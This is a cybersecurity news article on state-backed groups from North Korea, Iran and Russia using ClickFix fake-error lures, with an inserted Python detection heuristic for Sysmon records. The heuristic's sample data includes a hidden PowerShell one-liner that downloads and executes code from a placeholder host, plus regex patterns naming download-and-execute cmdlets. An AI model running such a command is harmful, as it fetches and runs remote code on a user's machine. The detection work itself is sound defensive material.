North Korea, Iran, Russia-Backed Hackers Deploy ClickFix in New Attacks


Government-backed hacking groups from North Korea (TA427), Iran (TA450), and Russia (UNK_RemoteRogue, TA422) are now using the ClickFix technique in their espionage campaigns. Learn about Proofpoint’s insights into this new wave of attacks.

Proofpoint has recently discovered a concerning development related to ClickFix, a dangerous social engineering method. Reportedly, government-backed hacking groups are now using this technique, exploiting users’ trust by presenting fake error messages or security alerts that appear to come from the operating system or from familiar applications.

Users are tricked into copying and running code in their computer’s command-line interface, believing it is a solution to their problem. When executed, however, this code runs malicious commands on the victim’s machine.
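A defender-side illustration of the pattern described above, added here as an example and not taken from the Proofpoint report or the article: a small heuristic over constructed Sysmon-style process-creation records that flags a shell launched interactively (assumed here to be from the Run dialog, so explorer.exe is the parent) with a command line carrying the tell-tale flags of a pasted ClickFix command. Field names and sample events are constructed for the example.

```python
import re

# Constructed Sysmon-style process-creation records (not from the article).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iex (iwr http://example.invalid/x)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -EncodedCommand SQBFAFgA"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoLogo -NoExit"},  # benign interactive launch
]

# Assumption: a command pasted into Win+R / the Run dialog is spawned by explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Indicators typical of a one-liner meant to be pasted by the victim and run unseen.
SUSPICIOUS = [
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", "encoded command"),
    (r"\b(iex|invoke-expression)\b", "inline expression evaluation"),
    (r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", "remote download"),
    (r"-nop\b|-noprofile\b", "profile bypass"),
]


def basename(path):
    """Last path component, lower-cased, for comparing image names."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of reasons an event looks like a pasted ClickFix command ([] if none)."""
    if basename(ev["Image"]) not in SHELLS:
        return []
    if basename(ev["ParentImage"]) not in INTERACTIVE_PARENTS:
        return []
    cmd = ev["CommandLine"]
    return [why for pat, why in SUSPICIOUS if re.search(pat, cmd, re.IGNORECASE)]


def find_clickfix_candidates(events):
    """Yield (command line, reasons) for every event with at least one indicator."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits.append((ev["CommandLine"], reasons))
    return hits
```

The heuristic is deliberately narrow; in a real deployment the parent-process assumption and the indicator list would be tuned to the environment and paired with the RunMRU history the Run dialog leaves behind.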

Last year, Hackread.com raised an alarm about the rising popularity of the ClickFix attack among cybercriminals starting in March 2024, after groups like TA571 and ClearFake used it. In October 2024, Sekoia observed a rise in ClickFix attacks involving fake Google Meet, Chrome, and Facebook pages tricking users into downloading malware.

The latest wave of ClickFix attacks was observed between July 2024 and early 2025, with North Korea, Iran, and Russia-backed hackers incorporating ClickFix into their usual operations.

Attacks Timeline (Source: Proofpoint)

North Korea (TA427)

In early 2025, TA427 (Kimsuky, Emerald Sleet) targeted individuals from 5 organisations in the think tank sector working on North Korea affairs. They used deceptive meeting requests and fake websites to trick them into running PowerShell commands. One successful attack involved impersonating a Japanese diplomat (Ambassador Shigeo Yamada) and led to the installation of QuasarRAT malware.

Malicious email (Source: Proofpoint)

Iran (TA450)

In November 2024, TA450 (MuddyWater, Mango Sandstorm) targeted 39 organisations, mainly finance and government sectors, in the Middle East with fake Microsoft security update emails. They used ClickFix to persuade users to run PowerShell commands that installed the Level RMM tool, which the attackers intended to use for espionage and data theft. No further use of ClickFix by this group was observed afterwards.


Russia (UNK_RemoteRogue and TA422)

UNK_RemoteRogue used ClickFix once, in December 2024, targeting individuals at two prominent arms manufacturing firms in the defence industry. The emails carried a link to a fake Microsoft Office page with instructions in Russian to copy and paste code; that code executed JavaScript, which in turn ran PowerShell linked to the Empire framework.

TA422 (Sofacy, APT28) employed ClickFix in October 2024, targeting Ukrainian entities, sending phishing emails with a link mimicking a Google spreadsheet sent out by CERT-UA that led to a reCAPTCHA, which, upon clicking, provided a PowerShell command to create an SSH tunnel and run Metasploit.

These groups, however, are not completely changing their attack methods. Instead, they are using ClickFix to replace certain steps in how they initially infect a target’s computer and run malicious software. Proofpoint’s blog post also notes that it has not observed any Chinese government-backed groups using ClickFix, possibly due to limited visibility into their activities.

Even though ClickFix is not yet a standard tool for state-sponsored actors, its increasing popularity suggests that this technique could become more common in government-backed cyber espionage campaigns in the coming months, researchers conclude.